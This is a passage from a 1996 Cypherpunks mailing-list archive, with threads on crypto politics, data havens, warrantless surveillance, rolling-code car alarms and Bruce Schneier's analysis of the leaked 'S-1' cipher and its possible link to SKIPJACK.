NT 3.5x, 4.0.  MWC, Inc. uses proprietary procedures to recover Windows NT
installation with a lost administrator's password.
      More information about this service is available at:

      http://www.omna.com/yes/mwc/prs-index.htm


      *** NT Network Examination ***

      MWC offers Network Examination Services for
Windows NT based Internet connected Networks to help you answer the
following questions:
      7 Is your Internet Server Vulnerable?
      7 Is your Production Server Vulnerable?
      7 Is your Network Vulnerable?


      *** Partial List of Satisfied Customers***
      is published at:

      http://www.omna.com/yes/mwc/cust-security.htm


      For more information please contact Andy Pozo, Director of Sales
AndyPozo@box.omna.com , Tel 614-263-0662 Fax 614-263-0663


      MWC NT Security Team.





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: jim bell <jimbell@pacifier.com>
Date: Fri, 16 Aug 1996 07:22:00 +0800
To: cypherpunks@toad.com
Subject: Re: Schlafly helped defeat ERA, supported Goldwater--where do I sign up?
Message-ID: <199608152000.NAA03130@mail.pacifier.com>
MIME-Version: 1.0
Content-Type: text/plain


At 09:48 AM 8/15/96 -0700, Timothy C. May wrote:
>At 1:53 PM 8/15/96, Declan McCullagh wrote:
>>Take a look at the Boston Coalition for Freedom of Expression's list of
>>enemies of free expression. Excerpt follows.
>>Linkname: Phyllis Schlafly, Eagle Forum
>>Filename: http://www.eff.org/pub/Groups/BCFE/bcfenatl.html#Schlafly
>>
>>   Phyllis Schlafly
>....
>>   "Leading the pro-family movement to victories since 1972." Basic
>>   membership includes a subscription to The Phyllis Schlafly Report and
>>   costs $15.00. Mrs. Schlafly, whose husband Fred used to head the World
>>   Anti-Communist League, is the person considered most responsible for
>>   the defeat of the ERA. Her book A Choice Not an Echo, published in
>        ^^^^^^^^^^^^^^^^^
>>   1964 to support the presidential aspirations of Barry Goldwater, is
>                                                    ^^^^^^^^^^^^^^^
>>   one of the seminal texts of contemporary American conservative
>>   politics.
>
>So, she helped defeat the ERA and supported Goldwater. Sounds pretty good
>to me. From this excerpt, I'd call her a friend of liberty.

I think it's interesting that one of the most effective methods the 
Democrats used to defeat Goldwater was the fear that he would get us into 
war (Girl and daisy ad, for example) and when Johnson was elected he 
promptly got us into the Vietnam war. 

Jim Bell
jimbell@pacifier.com




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Black Unicorn <unicorn@schloss.li>
Date: Fri, 16 Aug 1996 05:22:06 +0800
To: Lou Zirko <lzirko@c2.org>
Subject: Re: Fw: Re: Free Pronto Secure Offer
In-Reply-To: <199608150252.TAA29747@infinity.c2.org>
Message-ID: <Pine.SUN.3.94.960815130536.713B-100000@polaris>
MIME-Version: 1.0
Content-Type: text/plain


On Wed, 14 Aug 1996, Lou Zirko wrote:

> To: unicorn@schloss.li, cypherpunks@toad.com, geoff@commtouch.co.il
> Date: Wed Aug 14 21:52:47 1996

> PGP.  If I remember, your platform in Linux

Incorrect.

> and you should not be so quick 
> to criticize what you may have not seen.

I saw his promotional tactic, and that's what I criticized.

> Lou Zirko                                (502)383-2175
> Zystems                                  lzirko@c2.org
> "We're all bozos on this bus" - Nick Danger, Third Eye

--
I hate lightning - finger for public key - Vote Monarchist
unicorn@schloss.li





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Robin Powell <rpowell@algorithmics.com>
Date: Fri, 16 Aug 1996 05:42:26 +0800
To: cypherpunks@toad.com
Subject: Re: Burden of proof
In-Reply-To: <ae37e59e070210042a4f@[205.199.118.202]>
Message-ID: <96Aug15.132311edt.20486@janus.algorithmics.com>
MIME-Version: 1.0
Content-Type: text/plain


>>>>> In article <ae37e59e070210042a4f@[205.199.118.202]>, tcmay@got.net (Timothy C. May) writes:

    > At 1:53 AM 8/15/96, Alan Horowitz wrote:
    >> In the USA, we have a system that ensures that the burden of proof is on
    >> the accuser.

    > Which explains why in the  U.S. the tax authorities take the money first
    > and then require the citizen to be the "accuser" in Tax Court, pleading to
    > get his seized assets back.

    > (To outsiders, the U.S. tax authorities have broad powers to seize
    > properties without any court process, to attach wages, to deputize
    > employers and banks as unpaid tax collectors, and to harass citizens.
    > Citizen-units may sue, of course, but the burden of proof is on them to
    > prove that they are owed a refund. A man who saves money and puts it in his
    > mattress can have it seized and taken from him. He must produce proof that
    > it is his money, never mind that he already paid taxes on it and never mind
    > that there is no way someone who saves currency can have a proper paper
    > trail. So much for "burdens of proof.")

This relates to something I have been wondering about:  If one could
get one's company to pay one in electronic cash, what is to stop one
from piling the coins in a Datahaven somewhere (assuming one existed
that would be usable for these purposes) and say to the IRS: Money?
What money?  Can you find any of my money?  I, uhh... lost it!  Yeah,
that's it!!

-Robin
In-Reply-To: tcmay@got.net's message of Wed, 14 Aug 1996 23:19:08 -0400
Subject: Re: Burden of proof
Reply-To: rpowell@algorithmics.com
X-Spook: Panama Nazi Treasury explosion terrorist SDI Semtex strategic smuggle 
References: <ae37e59e070210042a4f@[205.199.118.202]>

>>>>> In article <ae37e59e070210042a4f@[205.199.118.202]>, tcmay@got.net (Timothy C. May) writes:

    > At 1:53 AM 8/15/96, Alan Horowitz wrote:
    >> In the USA, we have a system that ensures that the burden of proof is on
    >> the accuser.

    > Which explains why in the  U.S. the tax authorities take the money first
    > and then require the citizen to be the "accuser" in Tax Court, pleading to
    > get his seized assets back.

    > (To outsiders, the U.S. tax authorities have broad powers to seize
    > properties without any court process, to attach wages, to deputize
    > employers and banks as unpaid tax collectors, and to harass citizens.
    > Citizen-units may sue, of course, but the burden of proof is on them to
    > prove that they are owed a refund. A man who saves money and puts it in his
    > mattress can have it seized and taken from him. He must produce proof that
    > it is his money, never mind that he already paid taxes on it and never mind
    > that there is no way someone who saves currency can have a proper paper
    > trail. So much for "burdens of proof.")

This relates to something I have been wondering about:  If one could
get one's company to pay one in electronic cash, what is to stop one
from piling the coins in a Datahaven somewhere (assuming one existed
that would be usable for these purposes) and say to the IRS: Money?
What money?  Can you find any of my money?  I, uhh... lost it!  Yeah,
that's it!!

-Robin




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Black Unicorn <unicorn@schloss.li>
Date: Fri, 16 Aug 1996 05:27:09 +0800
To: Jim Choate <ravage@EINSTEIN.ssz.com>
Subject: Re: [NOISE] "X-Ray Gun" for imperceptible searches (fwd)
In-Reply-To: <199608150313.WAA08490@einstein>
Message-ID: <Pine.SUN.3.94.960815131921.1400A-100000@polaris>
MIME-Version: 1.0
Content-Type: text/plain


On Wed, 14 Aug 1996, Jim Choate wrote:

> 
> Forwarded message:
> 
> > Date: Wed, 14 Aug 1996 22:24:39 -0400 (EDT)
> > From: Black Unicorn <unicorn@schloss.li>
> > Subject: Re: [NOISE] "X-Ray Gun" for imperceptible searches
> > 
> > Correct.  No warrant is required to observe that which is freely collected
> > after eminating from the residence of another and observed off his
> > property.
> > 
> > Same concept applies to the "sniff" test and ariel views into greenhouses.
> 
> Pitty somebody doesn't bring a suite against the FCC under this logic. It
> would particularly impact radar detectors, cell phones, and other types of
> scanners.

Uh, what is the chain of logic that supports this suit exactly?

> 
>                                                  Jim Choate
> 
> 

--
I hate lightning - finger for public key - Vote Monarchist
unicorn@schloss.li





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Matt Thomlinson <mattt@microsoft.com>
Date: Fri, 16 Aug 1996 07:45:10 +0800
To: "'jim bell'" <stephen@iu.net>
Subject: RE: Stopped Clock. Was: Schlafly on Crypto
Message-ID: <c=US%a=_%p=msft%l=RED-77-MSG-960815202758Z-37065@RED-05-IMC.itg.microsoft.com>
MIME-Version: 1.0
Content-Type: text/plain


relation: mother-son

>----------
>From: 	Stephen Cobb[SMTP:stephen@iu.net]
>Sent: 	Thursday, 15 August, 1996 1:16 PM
>To: 	jim bell
>Cc: 	cypherpunks@toad.com
>Subject: 	Re: Stopped Clock. Was: Schlafly on Crypto
>
>Speaking as someone who seldom agrees with Phyllis Schlafly...and not
>meaning to be overly ignorant or paranoid or disrespectful, but is there any
>link between her column and Roger Schlafly, as in:
>
>Schlafly v. Public Key Partners & RSA Data Security, Case C-94-20512 SW PVT
>
>or is it mere coincidence.
>
>Reminds me of the Doonesbury cartoon of conspiracy theorists, circa O.J.
>case: "Wait a minute, Hertz has an office in Dallas."
>"Coincidence?"
>"I don't think so."
>
>Stephen
>
>




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Black Unicorn <unicorn@schloss.li>
Date: Fri, 16 Aug 1996 06:00:32 +0800
To: geoff <geoff@commtouch.co.il>
Subject: Re: Fw: Re: Free Pronto Secure Offer
In-Reply-To: <19960815074728122.AAA103@geoff.commtouch.co.il>
Message-ID: <Pine.SUN.3.94.960815132043.1400B-100000@polaris>
MIME-Version: 1.0
Content-Type: text/plain


On Thu, 15 Aug 1996, geoff wrote:

> -----BEGIN PGP SIGNED MESSAGE-----
> 
> To: unicorn@schloss.li, cypherpunks@toad.com
> Date: Thu Aug 15 10:53:53 1996
> On 14 Aug unicorn wrote:
>  
> > "Do all the work I should be doing or have done in the first place
> > discover the critical flaws in my new-keen-o-ka-jive-o crypto system
> > and I will give you a free copy of a critically flawed crypto system 
> > (a $99.00 value) ABSOLUTELY FREE.  Wait, don't order yet.  Included 
> > you also get to> actually whitewash my fence and then mow my lawn.  
> > All at NO COST to you."
> 
> Unicorn, please try to take a minute to think before hitting that send 
> key.
> 
> You infer that a product is critically flawed without even trying it ?

No, I was merely pointing out that if the review revealed that it had
problems (one assumed that the intent of peer review is to reveal such
problems in the first place, but perhaps you just like giving software
away?) then the offered reward was valueless.

> There are quite a few members of this list who are using Pronto Secure 
> and will testify to the contrary. 

A lot of people use DES on this list too I'll wager.

> See http://www.commtouch.com/testers.htm for a list of people who take 
> the trouble to try out a product before venturing an opinion.

I "tried out" your promotional scheme when I read your message, and it was
that scheme which my opinion targeted.

> Agreed that feedback from external testers is a good deal for 
> developers. It is also not a bad deal for evaluators,

This is a subjective question.

> they get a free 
> copy of a product which in the case of Pronto Secure many find useful 
> (as witnessed by x-mailer headers on c'punk traffic).

Cypherpunks is always getting the cash poor developer who thinks he very
clever because he has to pay testers no money if he offers his new product
free to the person who discovers a flaw, or writes a review.

>From your home page, I would guess that you request that reviewers allow
you to make their comments public.  That's called an endorsement, and, by
the way, people are usually paid for them.  Sometimes in the millions.

Think Michael Jordan is getting a deal when you use his name to promote
your product and then give him a $99.00 piece of software (which is
effectively worth the amount of time it takes to write a few kiss ass
paragraphs on the software, not $99.00)?

> Testers also get 
> an opportunity to contribute neat feature ideas which helps propagate 
> secure messaging to the masses. 

Alturisim is a pipe dream.

> Unicorn, you are invited to whitewash my fence :)

Do I have to review pronto secure first?

> 
> - ---------------------------------------------------------------
> Geoff Klein, Pronto Secure Product Manager;   www.commtouch.com 
> My PGP public Key 1814AD45 can be obtained by sending a message
> to geoff@commtouch.co.il with "Get PGP Key" as the subject.
> - ----------------------------------------------------------------

--
I hate lightning - finger for public key - Vote Monarchist
unicorn@schloss.li





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "Douglas R. Floyd" <dfloyd@io.com>
Date: Fri, 16 Aug 1996 06:59:49 +0800
To: schmidt@pin.de (Stephan Schmidt)
Subject: Re: Jurisdictionless Distributed Data Havens
In-Reply-To: <Pine.LNX.3.94.960815140139.27838A-100000@blau.pin.de>
Message-ID: <199608151830.NAA10012@xanadu.io.com>
MIME-Version: 1.0
Content-Type: text/plain


> 
> 
> Some annotations:
> 
> 1. The easiest way to make such a distributeted data havens (DDH)
> would be to use a distributed unix file system that
> doesn't distribute files but chunks of bytes. (Striping)
> 

Like AFS?

> Advantage: 
> - All normal services would work: ftp,http,...
> - Copying, deleting and modifing files.
> - Easy to install and use.
> 
> Problems:
> Because each side can supply all data (collecting on
> the fly from other DDHs), the site holder
> could be responsible for the data.
> This could be prevented by collecting and
> assembling data at the client side (e.g. using
> JAVA).

How many people trust clients?  If we wanted clients, we would use WebStor
from Mcaffee.  I don't trust any clients specific to one task, and would
rather use generic E-mail/ftp/www.

> 
> 2. When the DDHs are distributed around the world in
> a lot of different states, it could be very
> difficult for any government to get any evidence for
> "illegal" data on one site.

In some countries, when the government jails someone, it doesn't matter
what evidence they have.  Not everyone has a justice system that at least
makes an attempt to give a fair trial.






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Jim Choate <ravage@einstein.ssz.com>
Date: Fri, 16 Aug 1996 06:34:37 +0800
To: unicorn@schloss.li (Black Unicorn)
Subject: Re: [NOISE] "X-Ray Gun" for imperceptible searches (fwd)
In-Reply-To: <Pine.SUN.3.94.960815131921.1400A-100000@polaris>
Message-ID: <199608151851.NAA09462@einstein>
MIME-Version: 1.0
Content-Type: text



Hi all,

> On Wed, 14 Aug 1996, Jim Choate wrote:
> 
> > 
> > Forwarded message:
> > 
> > > Date: Wed, 14 Aug 1996 22:24:39 -0400 (EDT)
> > > From: Black Unicorn <unicorn@schloss.li>
> > > Subject: Re: [NOISE] "X-Ray Gun" for imperceptible searches
> > > 
> > > Correct.  No warrant is required to observe that which is freely collected
> > > after eminating from the residence of another and observed off his
> > > property.
> > > 
> > > Same concept applies to the "sniff" test and ariel views into greenhouses.
> > 
> > Pitty somebody doesn't bring a suite against the FCC under this logic. It
> > would particularly impact radar detectors, cell phones, and other types of
> > scanners.
> 
> Uh, what is the chain of logic that supports this suit exactly?

Simple actualy. The police don't need a warrant to collect such information
because it is in the public domain (ie not private and therefor requiring
a search warrant and probable cause). Therefore anybody (not just cops)
can pick it up.

It is becoming more and more popular for governments to limit the ability
of scanners and other such detectors to pick up information supposedly 
to protect privacy. The above states that if it is eminating from the
residence (and by extension person) and is picked up off their property,
perhaps on or in public space then it is fair game. Clearly we have
two current standards for evidence collection which are directly at odds.

States such as N. Carolina (per extension via the 14th) should be 
prohibited from regulating or otherwise controlling possesion and use
of radar detectors (in this case) which are currently illegal for
private persons to operate. If the police don't need a warrant to
collect information then citizens are equaly able to recieve that
information as well. Since the above ruling states that as long as the
emissions are eminating from the site and the reception takes place
other than at the site (in this case, being inside the police car)
, perhaps along a public highway, then no privacy is involved. This
means that citizens have a right, by extension, to know when they are
being beamed by radar.

This same chain of logic can be extended to cell phones and such as
well.

This connection is even clearer when one realizes that the only difference
between IR and your cell phone eminations is frequency. The intermediate
vector boson in both cases is a photon.

It is similar to arresting somebody for wearing a blue shirt but letting
the person wearing the red shirt go free. The rationale being that since
the frequency of the blue shirt is higher it is fundamentaly different
then the red shirt.

This ruling is prima facia evidence that the judicial system as a whole
has no clear grasp of technology, not just Internet technology.


                                                     Jim Choate





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Bart  Croughs <bart.croughs@tip.nl>
Date: Thu, 15 Aug 1996 22:59:37 +0800
To: "'cypherpunks@toad.com>
Subject: Re: National Socio-Economic Security Need for Encryption Technology
Message-ID: <01BB8AB1.1F348240@groningen10.pop.tip.nl>
MIME-Version: 1.0
Content-Type: text/plain


Sandy Santford wrote:

>Bart Croughs wrote:

>> If you don't know the answer, there's nothing to be ashamed of.

It is just this sort of unnecessary condescending snottiness that
create the clear impression that Bart is an asshole.  Perhaps he
is a fine chap and this is just his style, but I find it very
offensive an counter-productive in this discussion.


 S a n d y<

To prove that I'm behaving badly you quote me out of context. My 
statement 'If you don't know the answer, there's nothing to be 
ashamed of', was immediately followed by the statement 'I don't 
know the answer either'. In this context, my statement wasn't that 
snotty. After all, I made clear that in this respect I wasn't any 
better than you. So I think you are overreacting a bit. Second, I 
didn't complain about the tone of your previous posts when you 
talked about me 'fretting' about the dropping wages of American 
workers, or when you wrote 'yada, yada, yada' in response to one 
of my posts. I don't even complain when you call me an asshole 
(except that maybe next time you start calling names you could 
be a bit more imaginative...) It's not that important. I guess I just 
get subconsciously a little irritated, and that's the reason I'm 
maybe a little less polite when I answer your posts than you would 
like me to be. So if you want me to behave nicer when I answer 
your posts, the best way to achieve this would be to start 
behaving nicer yourself.

Bart Croughs











From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Stephan Schmidt <schmidt@pin.de>
Date: Thu, 15 Aug 1996 23:43:10 +0800
To: Kevin Stephenson <cts@deltanet.com>
Subject: Re: Jurisdictionless Distributed Data Havens
In-Reply-To: <3212B0CB.1AB7@deltanet.com>
Message-ID: <Pine.LNX.3.94.960815140139.27838A-100000@blau.pin.de>
MIME-Version: 1.0
Content-Type: text/plain



Some annotations:

1. The easiest way to make such a distributeted data havens (DDH)
would be to use a distributed unix file system that
doesn't distribute files but chunks of bytes. (Striping)

Advantage: 
- All normal services would work: ftp,http,...
- Copying, deleting and modifing files.
- Easy to install and use.

Problems:
Because each side can supply all data (collecting on
the fly from other DDHs), the site holder
could be responsible for the data.
This could be prevented by collecting and
assembling data at the client side (e.g. using
JAVA).

2. When the DDHs are distributed around the world in
a lot of different states, it could be very
difficult for any government to get any evidence for
"illegal" data on one site.

-- stephan





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Blanc Weber <blancw@microsoft.com>
Date: Fri, 16 Aug 1996 08:29:08 +0800
To: "'cypherpunks@toad.com>
Subject: RE: National Socio-Economic Security Need for Encryption Technology
Message-ID: <c=US%a=_%p=msft%l=RED-81-MSG-960815211346Z-703@tide21.microsoft.com>
MIME-Version: 1.0
Content-Type: text/plain


>From: 	Bart  Croughs
>
> If the situation is so clear, why can't you give the proof I'm asking for?
................................................

Well, first of all, I never intended to provide one.   I don't know why
you are asking for proof.   I don't know why anyone should be moved to
give one to you.  

   ..
Blanc

>
>
>




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: iang@cs.berkeley.edu (Ian Goldberg)
Date: Fri, 16 Aug 1996 08:29:31 +0800
To: cypherpunks@toad.com
Subject: Re: Jurisdictionless Distributed Data Havens
In-Reply-To: <3212B0CB.1AB7@deltanet.com>
Message-ID: <4v05k2$jq9@abraham.cs.berkeley.edu>
MIME-Version: 1.0
Content-Type: text/plain


-----BEGIN PGP SIGNED MESSAGE-----

In article <3212B0CB.1AB7@deltanet.com>,
Kevin Stephenson  <cts@deltanet.com> wrote:
>DigiCash will never work in my book because it requires an account,

Actually, it doesn't...  It's just that in order to use DigiCash's ecash
without an account, you need a slightly cooler client, which (AFAIK)
nobody's gotten around to writing (yet).

   - Ian "you'll have to wait until after Crypto..."

-----BEGIN PGP SIGNATURE-----
Version: 2.6.2

iQCVAwUBMhOZvEZRiTErSPb1AQFlZAP7B7jpZguOk0vA30pkgY6W17SHf/F8ik1/
SOWYiYdSzZ9go9BhoMQyyF68EzzUgwtsqlD3RAU31eMIqMrsAKaHDwp8bMHo7wUc
FgQZtMniJlPj1oukLegFpueDAEcKhM+HDaYehgeKvf24CSlw3o6vi1li7x4R1GKc
22aco7e6/s4=
=W86h
-----END PGP SIGNATURE-----




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Simon Spero <ses@tipper.oit.unc.edu>
Date: Fri, 16 Aug 1996 06:51:42 +0800
To: "Douglas R. Floyd" <dfloyd@io.com>
Subject: Re: forget photographing license plates!
In-Reply-To: <199608151523.KAA03014@xanadu.io.com>
Message-ID: <Pine.SUN.3.91.960815144122.26417A-100000@tipper.oit.unc.edu>
MIME-Version: 1.0
Content-Type: text/plain


Another UK vehicle security reply (disclaimer: my dad's company installs 
alarms, imobilisers, lojack/skynet, etc.)

The first generation of remote-keyed car-alarms used a static key. It 
didn't take long before people had modified scanners to record the key 
and play it back as soon as the driver had left. 

The current generation uses what is described as "rolling code random 
encryption". From what I could work out from talking to people, this 
scheme works something like a one time password scheme, but with no 
feedback from server (car) to client (keyfob). It seems that the keyfob 
has persistent state in the form of a  counter, which is incremented 
every time the key is pressed. This counter is combined with the 
encryption key and the resulting cyphertext is then transmitted.

 The car keeps a record of the last successful sequence number, and will 
not allow earlier sequences to be replayed. The car will accept sequence 
numbers within a certain range of the last successful one, in case a 
particular try is not recieved, or the key is jostled in ones pocket.

I don't know how strong the algorithms are, or how long the keys are; 
there are supposed to be minimum requirements on key length, but I don't 
know if the approval body evaluates the crypto.

Simon

---
Cause maybe  (maybe)		      | In my mind I'm going to Carolina
you're gonna be the one that saves me | - back in Chapel Hill May 16th.
And after all			      | Email address remains unchanged
You're my firewall -    	      | ........First in Usenet.........




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Checkered Daemon <cdaemon@goblin.punk.net>
Date: Fri, 16 Aug 1996 09:18:36 +0800
To: jamesd@echeque.com (James A. Donald)
Subject: RANT re: National Socio-Economic Security Need for
In-Reply-To: <199608150629.XAA03193@dns2.noc.best.net>
Message-ID: <199608152226.PAA23432@goblin.punk.net>
MIME-Version: 1.0
Content-Type: text/plain


James A. Donald opines:
 
> At 06:24 PM 8/13/96 -0700, Checkered Daemon wrote:
> > a)  Knowledge jobs require tremendous capital investment, as in degrees,
> > training, continual updating of skills, etc.
> 
> But they do not require much capital investment by the boss.  That is 
> to say the key corporate assets are increasingly owned by the employees,
> 
> At some point one would expect this to lead to a change in business 
> structure, but I see no signs of this happening.

One large change, which has been discussed previously on the list, is that
management is becoming more and more a function of specifying WHAT is to
be done, rather than HOW it is to be done.  This leads to a business model
based more on the independent contractor (whether it's a single individual,
or a business that does 'outsourcing' work) than the traditional industrial
assembly line.

Add ubiquitous high-speed data communications networks, and suddenly
national governments become not only irrelevant, but actual impediments
to a free market economy.  Potholes, if you will, on the information
superhighway (attribution to T. May).  

The structural changes are many.  Worldwide regulatory and tax arbitrage.
Elimination of the entire job category of 'middle management'.  Capital
in the form of knowledge and reputation rather than fixed physical assets.
Intentionally temporary organizational structures.  Individual responsibility
for what used to be called 'benefits'.

I'm a networking consultant.  My father had three jobs in his entire
lifetime.  I had three jobs this morning.  If that's not structural change,
I don't know what is.

-- 
Checkered Daemon                              cdaemon@goblin.punk.net

Delirium:  There must be a word for it ... the thing that lets you know that
           TIME is happening.  IS there a word?
Sandman:   CHANGE.
Delirium:  Oh.  I was AFRAID of that.




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Bruce Schneier <schneier@counterpane.com>
Date: Fri, 16 Aug 1996 08:24:43 +0800
To: defcon@fc.net
Subject: Re: Can someone validate this code?
In-Reply-To: <199608151059.DAA01125@fat.doobie.com>
Message-ID: <v03007804ae39382ab06f@[204.246.66.72]>
MIME-Version: 1.0
Content-Type: text/plain


This looks like something that was anonymously posted to the Internet
about a year ago.  It is widely believed to be a hoax; if nothing else,
the key schedule is horrible.  David Wagner broke the algorithm based
on the key schedule alone.

This is what I wrote about S-1 last time around....

Bruce

----------------------------seperator---------------------------------

I was in Europe while S-1 was posted, so I missed most of the
discussion.  Better late than never....

Over the last year, I have spent considerable effort collecting
SKIPJACK information.  I have gone through the published
literature, the rumors, and a large stack of documents received
by EPIC through Freedom of Information Act (FOIA) lawsuits.

At Crypto last week I gave a Rump Session talk entitled "Reverse
Engineering SKIPJACK from Open Sources."  I prepared the slides
before I left for Europe.  Here is what I said:

     What the government told us:
          Single-key block cipher.
          Can be used in ECB, CBC, CFB, or OFB.
          64-bit block size.
          80-bit key size.

     What the review committee told us:
          32 rounds.
          No weak keys (like DES has).
          No key complementation property (like DES has).

     What the hardware specifications tell us:
          The latency of the Mykotronx chip has 64 clock cycles.
               This means two clock cycles per round.

     Assorted rumors (excuse me if I don't reveal sources):
          SKIPJACK does not have rounds in the same sense that
               DES does: i.e., half of the text block is not
               encrypted in each round.
          SKIPJACK has half the total S-box data as DES.
          SKIPJACK has a 48-bit internal structure analogous to a
               32-bit internal structure in DES.
          The masks for the Clipper/Capstone chip are
               unclassified and the chips can be produced in an
               unclassified foundry.  Part of the programming in
               the secure vault includes installing part of the
               SKIPJACK algorithm.  The part of the algorithm
               installed in the secure vault are the "S-tables",
               suggesting that perhaps unprogrammed Clipper chips
               can be programmed to implement other 80-bit key,
               32 round ciphers.

Trying to puzzle out the meaning of the third rumor, Matt Blaze
and I invented something called an Unbalanced Feistel Network.
These are Feistel networks where the source and target blocks are
of different size.  For example, in each round 48 bits might be
used as an input into the F function, and produce 16 output bits
to be XORed with the remainder of the bits.  We called this a
48:16 UFN, and we proposed a design at last year's Algorithms
Workshop in Leuven.  Our design was broken, but I am still
examining the structure.  A 48:16 UFN satisfies the first and
third rumor above, and I think it as good a guess as any
regarding SKIPJACK.

A few months ago, I found some additional information in the form
of documents released under FOIA.  One document was a Mykotronx
design review for "Project Capstone" dated 10 December 1991.  The
design review was unclassified.  Among the details about the
modular multipliers and the SHA code was the following page about
SKIPJACK:

     ECB Processing Rate

          2 clocks per G-Box operation
          x 1 G-box per shift
          x 32 shifts per ECB encryption
          ______________________________
          64 clocks per ECB

     64 clocks per ECB / 64 bits out per ECB = 1 clock per bit
     Yields 40 Mbit encryption using a 40 MHz clock.

The only other thing I found was a SECRET memo.  The organization
name (either from or to) is blacked out.  The date is 25 August
1992.  The subject is "SKIPJACK Revision."  Paragraph 2 is
blacked out, but paragraph 1 reads:

     1.  (U) The enclosed Informal Technical Report revises the
     F-table in SKIPJACK 3.  No other aspect of the algorithm is
     changed.

That's it.  Rounds are called "shifts," which seems to indicate
that they are not "rounds" in the DES sense.  A shift consists of
a "G-box" operation, which includes not only what we call the F-
F-function but the XOR as well.  And there is something called an
F-table, which could be a table of constants or perhaps a table
of functions.  In any case, it is something that can be revised
without changing the rest of the algorithm.

Now let's look at S-1.  The most probable explanation is that it
is a hoax.  But it is a very good hoax:

     The hoaxer knew enough about algorithm design to make a
          cipher that was not obviously lousy, while at the same
          time not unduly complicated.  The hoaxer knew enough to
          make a design that included three novel ideas not seen
          anywhere else: S-boxes that are created according to no
          known criteria, a G-table that chooses a rotation of
          S-boxes to use in a given round, and a bizarre key
          schedule.
     The hoaxer knew enough about how algorithms are used in the
          military to make a spookish interface.  I am
          particularly interested in the "zeroize" function, the
          separation of the key creation and key loading
          functions, and the key masking.  Blaze said that the
          interface was similar to the Fortezza interface, but
          not the same.
     The hoaxer knew about Blaze's and my MacGuffin paper and
          that we thought SKIPJACK was a 48:16 UFN.  We made no
          secret about this, and our paper is on Blaze's web
          page.  The hoaxer knew to use the term F-table.  I
          haven't shown many people what I found in EPIC's
          documents, so the hoaxer either had to look through
          them himself or get them by some other means (maybe an
          independent FOIA request).

It's not a perfect hoax, though.  The classification markings
look odd: NSA algorithms are SECRET, not TOP SECRET, and the
codeword restriction sentence is strange.  The key schedule is
hopelessly flawed (David Wagner posted an attack to sci.crypt).
The coding style is amateurish, like it was translated from one
language to another.  (Maybe this is clever on the hoaxer's
part.)  And there's even a typo in the code.

And maybe the hardware latency is wrong.  Clearly the design
facilitates parallelization.  You can precompute all possible F-
table outputs in previous shifts, and then use the G-table result
to select between them; I am not sure you can get a shift down to
two clock cycles.  I don't have the hardware background, and
would appreciate comments from others.

And why are there not bitwise permutations?  If SKIPJACK is
designed for hardware, it makes sense to put them in.  They're
free, after all.

Anyway, it's a real good hoax.  Blaze estimated that he could
have done it, but it would have taken him a month of effort.  I
agree with his assessment: one man-month.  It's a lot of time to
spend on a hoax, especially one where the hoaxer doesn't get any
credit.

So, maybe it's SKIPJACK.  It has a 64-bit block size and an 80-
bit key size.  It's a 48:16 UFN with 32 rounds (or shifts, or
whatever).  And it has an F-table.  This is really interesting,
because the structure really is an S-box.  Everyone knows it's an
S-box, and it makes no sense for a hoaxer to call it something
else.  But in S-1 it's called an F-table.  (I think this is very
significant, but others find it less convincing.)

And the F-table has been revised at least once.  In the code it
says that the F-table entries "differ in the S-2 version."  The
code is dated 1 February 1989 and 31 July 1991, and I have a memo
dated 25 August 1992 that says the F-table has been revised in
"SKIPJACK 3."  Pretty convincing, I think.  (Of course this means
that we can't confirm anything by testing the hardware, since the
F-table entries are different.)

Maybe there are no bit permutations because they make analysis
harder, and perhaps they don't add all that much.  Maybe the
algorithm was designed for both hardware and software, or maybe
it was designed for specialized cryptographic hardware with
several parallel microprocessors and some cryptographic
primitives.

If it is real, we have a lot to learn about S-box design.  The S-
boxes are not even balanced.  Maybe they are created just so to
avoid some bizarre attack we can only dream about, but I kind of
doubt it.

But the key schedule is just plain wrong.

So, here's a theory.  Let's assume the code is real.  (Not that
it's SKIPJACK, but that it's a real algorithm from some military
or some corporation.)  Clearly the code is not designed to test
the cryptographic algorithm, but to simulate some kind of
hardware interface: it's called a "software chip simulator."  If
I were the NSA and I designed an algorithm whose security rested
on some tables of constants, I might replace them with phony
constants before giving them to another organization to test.  I
might call the phony version S-1 and the real version S-2.

Maybe the code was originally written in FORTRAN, and then
translated into C.  (NSA doesn't use ADA.)

NSA algorithms are classified SECRET, put perhaps algorithms in
development are classified TOP SECRET.  (We know cryptanalytic
techniques can be TOP SECRET, so perhaps commented code falls
under that category as well.)

And maybe the code originally didn't have an 80-bit key schedule.
Maybe it had a longer key schedule.  The poster then modified
this key schedule to make it look more like SKIPJACK.  (This
might also explain the bug in the code, which might not be a bug
if it still had the original key schedule.)

Which leaves us precisely nowhere.  The most likely explanation
is that it is a hoax, but I am hard-pressed to imagine a hoaxer
with the requisite combination of skills, resources, and
attitude.  I also don't believe that it is SKIPJACK.  It might be
a preliminary design for SKIPJACK, but if both the key schedule
and F-table entries are wrong, we really haven't learned
anything.  If we suddenly discovered that unbalanced S-boxes are
far superior to balanced ones, then all best are off.

Bruce

**************************************************************************
* Bruce Schneier              APPLIED CRYPTOGRAPHY, 2nd EDITION is
* Counterpane Systems         available.  For info on a 15%
* schneier@counterpane.com    discount offer, send me e-mail.
*
* For Blowfish C code, see ftp.ox.ac.uk:/pub/crypto/misc/blowfish.c.gz
**************************************************************************






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Gregory Demetrick <gjdemetr@infi.net>
Date: Fri, 16 Aug 1996 07:06:38 +0800
To: Jeremey Barrett <jeremey@forequest.com>
